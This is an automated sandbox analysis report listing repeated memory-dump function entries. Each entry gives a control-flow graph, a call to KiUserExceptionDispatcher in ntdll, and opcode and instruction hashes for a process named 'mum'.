                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 7335a13acc2e208cab561582ff833dc95693dd98ac32a7245ed3f555e8902dbd
                                      • Instruction ID: e7c6e38978bf93b9f0452bc21ee4ecfb349a305e296778c66b9c46f2c79d92df
                                      • Opcode Fuzzy Hash: 7335a13acc2e208cab561582ff833dc95693dd98ac32a7245ed3f555e8902dbd
                                      • Instruction Fuzzy Hash: 21C1C174E00218CFDB14DFA5C994B9DBBB2BF89304F6090AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1513 2e5b30-2e5b50 1514 2e5b57-2e5c04 KiUserExceptionDispatcher 1513->1514 1515 2e5b52 1513->1515 1520 2e5c0c-2e5c1a 1514->1520 1515->1514 1521 2e5f32-2e5f64 1520->1521 1522 2e5c20-2e5c37 1520->1522 1525 2e5c3e-2e5c47 1522->1525 1526 2e5c39 1522->1526 1527 2e5f25-2e5f2b 1525->1527 1526->1525 1528 2e5c4c-2e5cc2 1527->1528 1529 2e5f31 1527->1529 1534 2e5d7e-2e5dd8 1528->1534 1535 2e5cc8-2e5d36 1528->1535 1529->1521 1546 2e5dd9-2e5e27 1534->1546 1544 2e5d38-2e5d78 1535->1544 1545 2e5d79-2e5d7c 1535->1545 1544->1545 1545->1546 1551 2e5e2d-2e5f0f 1546->1551 1552 2e5f10-2e5f1b 1546->1552 1551->1552 1553 2e5f1d 1552->1553 1554 2e5f22 1552->1554 1553->1554 1554->1527
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E5BFB
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: d6a5e9de99ed1669d1931fd6082b4a6f8bba8befa92fe69947b180c57deb6947
                                      • Instruction ID: ef43782569d9aede170eda980e0fd342af06bf07edeccf4614aa9179807a5abf
                                      • Opcode Fuzzy Hash: d6a5e9de99ed1669d1931fd6082b4a6f8bba8befa92fe69947b180c57deb6947
                                      • Instruction Fuzzy Hash: 9AC1C274E10218CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1297 2e1600-2e1620 1298 2e1627-2e16d4 KiUserExceptionDispatcher 1297->1298 1299 2e1622 1297->1299 1304 2e16dc-2e16ea 1298->1304 1299->1298 1305 2e1a02-2e1a34 1304->1305 1306 2e16f0-2e1707 1304->1306 1309 2e170e-2e1717 1306->1309 1310 2e1709 1306->1310 1311 2e19f5-2e19fb 1309->1311 1310->1309 1312 2e171c-2e1792 1311->1312 1313 2e1a01 1311->1313 1318 2e184e-2e18a8 1312->1318 1319 2e1798-2e1806 1312->1319 1313->1305 1330 2e18a9-2e18f7 1318->1330 1328 2e1808-2e1848 1319->1328 1329 2e1849-2e184c 1319->1329 1328->1329 1329->1330 1335 2e18fd-2e19df 1330->1335 1336 2e19e0-2e19eb 1330->1336 1335->1336 1337 2e19ed 1336->1337 1338 2e19f2 1336->1338 1337->1338 1338->1311
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E16CB
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 75fc622ed238030e30796b505e173126d82ba9f92fa645ac056f0bb432517411
                                      • Instruction ID: a2e56b75fa3b96630b6484ab45ffc5fde4c045a546b374b6a893c1019a7366d7
                                      • Opcode Fuzzy Hash: 75fc622ed238030e30796b505e173126d82ba9f92fa645ac056f0bb432517411
                                      • Instruction Fuzzy Hash: C0C1D274E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E7EE3
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: fdfdebef8b3b54f20c63cc775ede2be39ea2f3c5bf3dd8a0090ae46075817f3b
                                      • Instruction ID: 9f15ce28088926458d7680385ee2379cc3db93ee39bebbee2e8048fec918f9b3
                                      • Opcode Fuzzy Hash: fdfdebef8b3b54f20c63cc775ede2be39ea2f3c5bf3dd8a0090ae46075817f3b
                                      • Instruction Fuzzy Hash: 3EC1D474E00258CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E71DC
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 0188de95ebdca33096a47c89325fcc1faf86dade1f9e7b8894c65b209794bfbc
                                      • Instruction ID: a312fc1649f3a7ef21de251ac2dea45a76efe3368c034883a47b2814d4f36321
                                      • Opcode Fuzzy Hash: 0188de95ebdca33096a47c89325fcc1faf86dade1f9e7b8894c65b209794bfbc
                                      • Instruction Fuzzy Hash: 92C1E474E04218CFDB14DFA5C994B9DBBB2BF89304F6090AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E7633
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: c9d01db357eb3453c48ecee7c71c558959c68d46ee93f9cd78e75718e59baacd
                                      • Instruction ID: 1fc481a1b8885ee4b7089e2ab4bb9420779de6f824f29fd366b48e986fd8c30f
                                      • Opcode Fuzzy Hash: c9d01db357eb3453c48ecee7c71c558959c68d46ee93f9cd78e75718e59baacd
                                      • Instruction Fuzzy Hash: 0FC1C174E04218CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E9043
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 9954078044a100790fdd8e1ee991794edaf0b1abfe33b9f063c79bc87b51751d
                                      • Instruction ID: 49e96c116445f10405a1a0d4cd635facd101c05e92688164e56fa58aa4134737
                                      • Opcode Fuzzy Hash: 9954078044a100790fdd8e1ee991794edaf0b1abfe33b9f063c79bc87b51751d
                                      • Instruction Fuzzy Hash: BEC1C174E00258CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E833B
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 4f56efc0406a8daac42d4240efbd6fbe91c278022558ce0afd177e6320d4423c
                                      • Instruction ID: 77de65fadd1c670a4b0f6a544bea8f5a2b192761030cd382958ff48b76c6deae
                                      • Opcode Fuzzy Hash: 4f56efc0406a8daac42d4240efbd6fbe91c278022558ce0afd177e6320d4423c
                                      • Instruction Fuzzy Hash: 25C1D174E00258CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1027 2e0048-2e0068 1028 2e006f-2e011c KiUserExceptionDispatcher 1027->1028 1029 2e006a 1027->1029 1034 2e0124-2e0132 1028->1034 1029->1028 1035 2e044a-2e047c 1034->1035 1036 2e0138-2e014f 1034->1036 1039 2e0156-2e015f 1036->1039 1040 2e0151 1036->1040 1041 2e043d-2e0443 1039->1041 1040->1039 1042 2e0449 1041->1042 1043 2e0164-2e01da 1041->1043 1042->1035 1048 2e0296-2e02f0 1043->1048 1049 2e01e0-2e024e 1043->1049 1060 2e02f1-2e033f 1048->1060 1058 2e0250-2e0290 1049->1058 1059 2e0291-2e0294 1049->1059 1058->1059 1059->1060 1065 2e0428-2e0433 1060->1065 1066 2e0345-2e0427 1060->1066 1068 2e043a 1065->1068 1069 2e0435 1065->1069 1066->1065 1068->1041 1069->1068
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E0113
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 8a33b4c39b000cc61da11bf0be37f473eac191b9a35fb3a9c4162f61699eb74f
                                      • Instruction ID: 08655ed1fb9d2e2bd83b158f967c7c3191557d8e84689d1445b594ebd8754683
                                      • Opcode Fuzzy Hash: 8a33b4c39b000cc61da11bf0be37f473eac191b9a35fb3a9c4162f61699eb74f
                                      • Instruction Fuzzy Hash: 22C1D274E00218CFDB14DFA5C994B9DBBB2BF89304F6080AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1405 2e5258-2e5278 1406 2e527f-2e5342 KiUserExceptionDispatcher 1405->1406 1407 2e527a 1405->1407 1413 2e565a-2e568c 1406->1413 1414 2e5348-2e535f 1406->1414 1407->1406 1417 2e5366-2e536f 1414->1417 1418 2e5361 1414->1418 1419 2e564d-2e5653 1417->1419 1418->1417 1420 2e5659 1419->1420 1421 2e5374-2e53ea 1419->1421 1420->1413 1426 2e54a6-2e5500 1421->1426 1427 2e53f0-2e545e 1421->1427 1438 2e5501-2e554f 1426->1438 1436 2e5460-2e54a0 1427->1436 1437 2e54a1-2e54a4 1427->1437 1436->1437 1437->1438 1443 2e5638-2e5643 1438->1443 1444 2e5555-2e5637 1438->1444 1446 2e564a 1443->1446 1447 2e5645 1443->1447 1444->1443 1446->1419 1447->1446
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E5323
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: cc5763ce9637d9ba93194c5d9584f6e5c6a03018fdd9c562feacf7fbe9b1afbd
                                      • Instruction ID: 53a0e045e4e83af393e724277416c73e039fa0db7a375bb6ae6f99b8d275d525
                                      • Opcode Fuzzy Hash: cc5763ce9637d9ba93194c5d9584f6e5c6a03018fdd9c562feacf7fbe9b1afbd
                                      • Instruction Fuzzy Hash: BDC1D174E10218CFDB14DFA5C994B9DBBB2BF89305F6080AAD409AB359DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1351 2e1a58-2e1a78 1352 2e1a7f-2e1b2c KiUserExceptionDispatcher 1351->1352 1353 2e1a7a 1351->1353 1358 2e1b34-2e1b42 1352->1358 1353->1352 1359 2e1e5a-2e1e8c 1358->1359 1360 2e1b48-2e1b5f 1358->1360 1363 2e1b66-2e1b6f 1360->1363 1364 2e1b61 1360->1364 1365 2e1e4d-2e1e53 1363->1365 1364->1363 1366 2e1e59 1365->1366 1367 2e1b74-2e1bea 1365->1367 1366->1359 1372 2e1ca6-2e1d00 1367->1372 1373 2e1bf0-2e1c5e 1367->1373 1384 2e1d01-2e1d4f 1372->1384 1382 2e1c60-2e1ca0 1373->1382 1383 2e1ca1-2e1ca4 1373->1383 1382->1383 1383->1384 1389 2e1e38-2e1e43 1384->1389 1390 2e1d55-2e1e37 1384->1390 1391 2e1e4a 1389->1391 1392 2e1e45 1389->1392 1390->1389 1391->1365 1392->1391
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E1B23
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 77ab25cba7a2139d2ad3df446a8dae18247df67877c618534f0229f7e59dfee2
                                      • Instruction ID: 52e437b9736896719f11d605af4889fac8b7b5c8c79009ca1a07e70ba4f4d95c
                                      • Opcode Fuzzy Hash: 77ab25cba7a2139d2ad3df446a8dae18247df67877c618534f0229f7e59dfee2
                                      • Instruction Fuzzy Hash: D5C1D374E00258CFDB14DFA5C994B9DBBB2BF89304F2480AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1189 2e0d50-2e0d70 1190 2e0d77-2e0e24 KiUserExceptionDispatcher 1189->1190 1191 2e0d72 1189->1191 1196 2e0e2c-2e0e3a 1190->1196 1191->1190 1197 2e1152-2e1184 1196->1197 1198 2e0e40-2e0e57 1196->1198 1201 2e0e5e-2e0e67 1198->1201 1202 2e0e59 1198->1202 1203 2e1145-2e114b 1201->1203 1202->1201 1204 2e0e6c-2e0ee2 1203->1204 1205 2e1151 1203->1205 1210 2e0f9e-2e0ff8 1204->1210 1211 2e0ee8-2e0f56 1204->1211 1205->1197 1222 2e0ff9-2e1047 1210->1222 1220 2e0f58-2e0f98 1211->1220 1221 2e0f99-2e0f9c 1211->1221 1220->1221 1221->1222 1227 2e104d-2e112f 1222->1227 1228 2e1130-2e113b 1222->1228 1227->1228 1230 2e113d 1228->1230 1231 2e1142 1228->1231 1230->1231 1231->1203
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E0E1B
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: d279e3d4580d049702522a9fc3e15d9b024a7e6abe21c51a8f7feb832bfe79a3
                                      • Instruction ID: 224804a5d4b6ae611a1fc684de16d82d0a0cd0311898ba8b101390adf4ac099e
                                      • Opcode Fuzzy Hash: d279e3d4580d049702522a9fc3e15d9b024a7e6abe21c51a8f7feb832bfe79a3
                                      • Instruction Fuzzy Hash: EEC1C274E00218CFDB14DFA5C994B9DBBB2BF89304F6480AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1243 2e11a8-2e11c8 1244 2e11cf-2e127c KiUserExceptionDispatcher 1243->1244 1245 2e11ca 1243->1245 1250 2e1284-2e1292 1244->1250 1245->1244 1251 2e15aa-2e15dc 1250->1251 1252 2e1298-2e12af 1250->1252 1255 2e12b6-2e12bf 1252->1255 1256 2e12b1 1252->1256 1257 2e159d-2e15a3 1255->1257 1256->1255 1258 2e15a9 1257->1258 1259 2e12c4-2e133a 1257->1259 1258->1251 1264 2e13f6-2e1450 1259->1264 1265 2e1340-2e13ae 1259->1265 1276 2e1451-2e149f 1264->1276 1274 2e13b0-2e13f0 1265->1274 1275 2e13f1-2e13f4 1265->1275 1274->1275 1275->1276 1281 2e1588-2e1593 1276->1281 1282 2e14a5-2e1587 1276->1282 1283 2e159a 1281->1283 1284 2e1595 1281->1284 1282->1281 1283->1257 1284->1283
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E1273
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 975da2b758f91796b9e7d6e95737986e6e6c244033cd15e7a27426991cb21db1
                                      • Instruction ID: da6125aa65756634554432d88876e82483d86aa4ca74373a2430f8f6349aac73
                                      • Opcode Fuzzy Hash: 975da2b758f91796b9e7d6e95737986e6e6c244033cd15e7a27426991cb21db1
                                      • Instruction Fuzzy Hash: B3C1C274E00258CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1081 2e04a0-2e04c0 1082 2e04c7-2e0574 KiUserExceptionDispatcher 1081->1082 1083 2e04c2 1081->1083 1088 2e057c-2e058a 1082->1088 1083->1082 1089 2e08a2-2e08d4 1088->1089 1090 2e0590-2e05a7 1088->1090 1093 2e05ae-2e05b7 1090->1093 1094 2e05a9 1090->1094 1095 2e0895-2e089b 1093->1095 1094->1093 1096 2e05bc-2e0632 1095->1096 1097 2e08a1 1095->1097 1102 2e06ee-2e0748 1096->1102 1103 2e0638-2e06a6 1096->1103 1097->1089 1114 2e0749-2e0797 1102->1114 1112 2e06a8-2e06e8 1103->1112 1113 2e06e9-2e06ec 1103->1113 1112->1113 1113->1114 1119 2e079d-2e087f 1114->1119 1120 2e0880-2e088b 1114->1120 1119->1120 1121 2e088d 1120->1121 1122 2e0892 1120->1122 1121->1122 1122->1095
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E056B
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 481a973e581fcde4598248293ed22f8dd608581df0a9bdb6e31efbb1b195e669
                                      • Instruction ID: 53ddbc764cd70a992fefe7d647ac9c73c05bcf4d50500210b9e99e417258abf4
                                      • Opcode Fuzzy Hash: 481a973e581fcde4598248293ed22f8dd608581df0a9bdb6e31efbb1b195e669
                                      • Instruction Fuzzy Hash: 32C1C174E01218CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1567 2e5f88-2e5fa8 1568 2e5faf-2e605c KiUserExceptionDispatcher 1567->1568 1569 2e5faa 1567->1569 1574 2e6064-2e6072 1568->1574 1569->1568 1575 2e638a-2e63bc 1574->1575 1576 2e6078-2e608f 1574->1576 1579 2e6096-2e609f 1576->1579 1580 2e6091 1576->1580 1581 2e637d-2e6383 1579->1581 1580->1579 1582 2e6389 1581->1582 1583 2e60a4-2e611a 1581->1583 1582->1575 1588 2e61d6-2e6230 1583->1588 1589 2e6120-2e618e 1583->1589 1600 2e6231-2e627f 1588->1600 1598 2e6190-2e61d0 1589->1598 1599 2e61d1-2e61d4 1589->1599 1598->1599 1599->1600 1605 2e6368-2e6373 1600->1605 1606 2e6285-2e6367 1600->1606 1608 2e637a 1605->1608 1609 2e6375 1605->1609 1606->1605 1608->1581 1609->1608
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E6053
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 934ab77d2432d8b0a86bf9d9b01356932e34b946a078679aaae3352536b8e1ea
                                      • Instruction ID: 8dcecdbbe57ea9145b543d1b34413613325c953e9c896c361fb56f7b65bd319c
                                      • Opcode Fuzzy Hash: 934ab77d2432d8b0a86bf9d9b01356932e34b946a078679aaae3352536b8e1ea
                                      • Instruction Fuzzy Hash: C4C1C274E00218CFDB14DFA5C994B9DBBB2BF89305F2080AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1729 2e6c90-2e6cb0 1730 2e6cb7-2e6d64 KiUserExceptionDispatcher 1729->1730 1731 2e6cb2 1729->1731 1736 2e6d6c-2e6d7a 1730->1736 1731->1730 1737 2e7092-2e70c4 1736->1737 1738 2e6d80-2e6d97 1736->1738 1741 2e6d9e-2e6da7 1738->1741 1742 2e6d99 1738->1742 1743 2e7085-2e708b 1741->1743 1742->1741 1744 2e6dac-2e6e22 1743->1744 1745 2e7091 1743->1745 1750 2e6ede-2e6f38 1744->1750 1751 2e6e28-2e6e96 1744->1751 1745->1737 1762 2e6f39-2e6f87 1750->1762 1760 2e6e98-2e6ed8 1751->1760 1761 2e6ed9-2e6edc 1751->1761 1760->1761 1761->1762 1767 2e6f8d-2e706f 1762->1767 1768 2e7070-2e707b 1762->1768 1767->1768 1769 2e707d 1768->1769 1770 2e7082 1768->1770 1769->1770 1770->1743
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E6D5B
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 5efd34990233d46aa03a68fc9a9e71419115948f54ea498f64b90be8435e8d29
                                      • Instruction ID: 647ce61737fa3eb3a729e54f17ce6f4c02563e158669060b0fc53f21792320b2
                                      • Opcode Fuzzy Hash: 5efd34990233d46aa03a68fc9a9e71419115948f54ea498f64b90be8435e8d29
                                      • Instruction Fuzzy Hash: 9CC1D274E04218CFDB14DFA5C994B9DBBB2BF89304F2080AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1621 2e63e0-2e6400 1622 2e6407-2e64b4 KiUserExceptionDispatcher 1621->1622 1623 2e6402 1621->1623 1628 2e64bc-2e64ca 1622->1628 1623->1622 1629 2e67e2-2e6814 1628->1629 1630 2e64d0-2e64e7 1628->1630 1633 2e64ee-2e64f7 1630->1633 1634 2e64e9 1630->1634 1635 2e67d5-2e67db 1633->1635 1634->1633 1636 2e64fc-2e6572 1635->1636 1637 2e67e1 1635->1637 1642 2e662e-2e6688 1636->1642 1643 2e6578-2e65e6 1636->1643 1637->1629 1654 2e6689-2e66d7 1642->1654 1652 2e65e8-2e6628 1643->1652 1653 2e6629-2e662c 1643->1653 1652->1653 1653->1654 1659 2e66dd-2e67bf 1654->1659 1660 2e67c0-2e67cb 1654->1660 1659->1660 1661 2e67cd 1660->1661 1662 2e67d2 1660->1662 1661->1662 1662->1635
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E64AB
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 2bf3064e869ff8be13a7b610eb2b740de2a9ec99120cac671b380bf1039057e0
                                      • Instruction ID: c965a0e7b1005d2af8ac3a9a59efc9b59909294caf5664645df218cb723af37a
                                      • Opcode Fuzzy Hash: 2bf3064e869ff8be13a7b610eb2b740de2a9ec99120cac671b380bf1039057e0
                                      • Instruction Fuzzy Hash: 4AC1C174E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1135 2e08f8-2e0918 1136 2e091f-2e09cc KiUserExceptionDispatcher 1135->1136 1137 2e091a 1135->1137 1142 2e09d4-2e09e2 1136->1142 1137->1136 1143 2e0cfa-2e0d2c 1142->1143 1144 2e09e8-2e09ff 1142->1144 1147 2e0a06-2e0a0f 1144->1147 1148 2e0a01 1144->1148 1149 2e0ced-2e0cf3 1147->1149 1148->1147 1150 2e0cf9 1149->1150 1151 2e0a14-2e0a8a 1149->1151 1150->1143 1156 2e0b46-2e0ba0 1151->1156 1157 2e0a90-2e0afe 1151->1157 1168 2e0ba1-2e0bef 1156->1168 1166 2e0b00-2e0b40 1157->1166 1167 2e0b41-2e0b44 1157->1167 1166->1167 1167->1168 1173 2e0cd8-2e0ce3 1168->1173 1174 2e0bf5-2e0cd7 1168->1174 1175 2e0cea 1173->1175 1176 2e0ce5 1173->1176 1174->1173 1175->1149 1176->1175
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E09C3
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: c8d1a265542049c5e320b6d5421f803e347e2f29f8b1c6f4e457540a0ef7b0a4
                                      • Instruction ID: f714baf23f00e0a5e624e040da1cca3b0d45ca6b173d4ab8dbf4181de4002734
                                      • Opcode Fuzzy Hash: c8d1a265542049c5e320b6d5421f803e347e2f29f8b1c6f4e457540a0ef7b0a4
                                      • Instruction Fuzzy Hash: 7BC1D274E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD409AB359DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E8793
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: ff200cadea1ac2654f95cb5faa0b9b0da46cfd2c688ca6dc9bea65140a46404e
                                      • Instruction ID: e7fca1abfe93fe56f0ea885b27efe254ebd648aa8989d6ebbaf552a10d0342a9
                                      • Opcode Fuzzy Hash: ff200cadea1ac2654f95cb5faa0b9b0da46cfd2c688ca6dc9bea65140a46404e
                                      • Instruction Fuzzy Hash: 36C1D374E14218CFDB14DFA5C994BADBBB2BF89304F2080AAD409AB355DB359E85CF50
                                      Uniqueness

